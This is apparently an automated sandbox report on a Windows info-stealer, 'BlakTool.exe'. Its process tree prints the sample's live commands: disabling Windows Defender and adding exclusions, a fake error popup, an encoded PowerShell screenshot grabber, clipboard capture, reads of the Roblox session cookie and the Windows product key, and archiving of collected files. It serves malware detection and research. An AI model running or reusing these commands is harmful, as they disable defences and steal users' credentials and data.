Analysis

  • max time kernel
    2s
  • max time network
    16s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 18:43

General

  • Target

    BlakTool.exe

  • Size

    24.8MB

  • MD5

    a053448552bfad71ae030068b669ce67

  • SHA1

    260da910d644ca868ea9be489e243c0f7edd6544

  • SHA256

    3179e176a06c90654c5b09926827b60c79f9c8d951bb64c982ad531571287434

  • SHA512

    8877b1f5fa0049e776b0b25f4123523ba29667ed54ab6dc56f0580817a3e71e5761677524ed89589c1ee2a90b3596c79ee9c9dc31b4e559c7d7a490f6875f00b

  • SSDEEP

    393216:nlkVni+kqfp1uhf48a1kq9tse4Yw+LTR2wfhtm1FurEUWjC3zDbd4AC:nlkVqmp1Whaa4Gd+Ll2wpI3dbCh4AC

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 16 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 43 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BlakTool.exe
    "C:\Users\Admin\AppData\Local\Temp\BlakTool.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:448
    • C:\Users\Admin\AppData\Local\Temp\BlakTool.exe
      "C:\Users\Admin\AppData\Local\Temp\BlakTool.exe"
      2⤵
      • Loads dropped DLL
      PID:4588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BlakTool.exe'"
        3⤵
          PID:440
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BlakTool.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            PID:8
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          3⤵
            PID:3640
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:4012
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
            3⤵
              PID:1900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2384
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "start bound.exe"
              3⤵
                PID:1732
                • C:\Users\Admin\AppData\Local\Temp\bound.exe
                  bound.exe
                  4⤵
                    PID:3980
                    • C:\Users\Admin\AppData\Local\Temp\onefile_3980_133732322001300385\obf.exe
                      bound.exe
                      5⤵
                        PID:2444
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c
                          6⤵
                            PID:1308
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c cls
                            6⤵
                              PID:3732
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c mode con: cols=150 lines=40
                              6⤵
                                PID:3480
                                • C:\Windows\system32\mode.com
                                  mode con: cols=150 lines=40
                                  7⤵
                                    PID:1680
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c title Reaper V5 [+] Authentication
                                  6⤵
                                    PID:4516
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Your Python version is not supported', 0, 'Error 000', 0+16);close()""
                              3⤵
                                PID:4560
                                • C:\Windows\system32\mshta.exe
                                  mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Your Python version is not supported', 0, 'Error 000', 0+16);close()"
                                  4⤵
                                    PID:1908
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  3⤵
                                    PID:1588
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist /FO LIST
                                      4⤵
                                      • Enumerates processes with tasklist
                                      PID:2452
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    3⤵
                                      PID:3448
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist /FO LIST
                                        4⤵
                                        • Enumerates processes with tasklist
                                        PID:1808
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                      3⤵
                                        PID:952
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                          4⤵
                                            PID:2828
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                          3⤵
                                          • Clipboard Data
                                          PID:5012
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-Clipboard
                                            4⤵
                                            • Clipboard Data
                                            PID:2212
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                          3⤵
                                            PID:1432
                                            • C:\Windows\system32\tasklist.exe
                                              tasklist /FO LIST
                                              4⤵
                                              • Enumerates processes with tasklist
                                              PID:3192
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:1136
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:1464
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "systeminfo"
                                                3⤵
                                                  PID:4648
                                                  • C:\Windows\system32\systeminfo.exe
                                                    systeminfo
                                                    4⤵
                                                    • Gathers system information
                                                    PID:3452
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                  3⤵
                                                    PID:4852
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                      4⤵
                                                        PID:4184
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ig20lbce\ig20lbce.cmdline"
                                                          5⤵
                                                            PID:4012
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB9F.tmp" "c:\Users\Admin\AppData\Local\Temp\ig20lbce\CSC96DC742887F4B1691DA3C133A9D82D.TMP"
                                                              6⤵
                                                                PID:5076
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:2000
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:2256
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                              3⤵
                                                                PID:3580
                                                                • C:\Windows\system32\tree.com
                                                                  tree /A /F
                                                                  4⤵
                                                                    PID:2624
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  3⤵
                                                                    PID:3776
                                                                    • C:\Windows\system32\tree.com
                                                                      tree /A /F
                                                                      4⤵
                                                                        PID:4252
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                      3⤵
                                                                        PID:3152
                                                                        • C:\Windows\system32\tree.com
                                                                          tree /A /F
                                                                          4⤵
                                                                            PID:1580
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                          3⤵
                                                                            PID:1924
                                                                            • C:\Windows\system32\tree.com
                                                                              tree /A /F
                                                                              4⤵
                                                                                PID:4116
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                              3⤵
                                                                                PID:2684
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:3036
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                3⤵
                                                                                  PID:4600
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                    4⤵
                                                                                      PID:2244
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                                                    3⤵
                                                                                      PID:3472
                                                                                      • C:\Windows\system32\getmac.exe
                                                                                        getmac
                                                                                        4⤵
                                                                                          PID:3152
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4482\rar.exe a -r -hp"781" "C:\Users\Admin\AppData\Local\Temp\jswHf.zip" *"
                                                                                        3⤵
                                                                                          PID:4504
                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI4482\rar.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI4482\rar.exe a -r -hp"781" "C:\Users\Admin\AppData\Local\Temp\jswHf.zip" *
                                                                                            4⤵
                                                                                              PID:2336
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                            3⤵
                                                                                              PID:2924
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic os get Caption
                                                                                                4⤵
                                                                                                  PID:4852
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                3⤵
                                                                                                  PID:4792
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic computersystem get totalphysicalmemory
                                                                                                    4⤵
                                                                                                      PID:1588
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                    3⤵
                                                                                                      PID:2300
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic csproduct get uuid
                                                                                                        4⤵
                                                                                                          PID:2308
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                        3⤵
                                                                                                          PID:3192
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                            4⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            PID:4776
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                          3⤵
                                                                                                            PID:3552
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic path win32_VideoController get name
                                                                                                              4⤵
                                                                                                              • Detects videocard installed
                                                                                                              PID:4660
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                            3⤵
                                                                                                              PID:3032
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                4⤵
                                                                                                                  PID:1068

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                            SHA1

                                                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                            SHA256

                                                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                            SHA512

                                                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            944B

                                                                                                            MD5

                                                                                                            d28a889fd956d5cb3accfbaf1143eb6f

                                                                                                            SHA1

                                                                                                            157ba54b365341f8ff06707d996b3635da8446f7

                                                                                                            SHA256

                                                                                                            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                                            SHA512

                                                                                                            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            944B

                                                                                                            MD5

                                                                                                            e448fe0d240184c6597a31d3be2ced58

                                                                                                            SHA1

                                                                                                            372b8d8c19246d3e38cd3ba123cc0f56070f03cd

                                                                                                            SHA256

                                                                                                            c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

                                                                                                            SHA512

                                                                                                            0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            64B

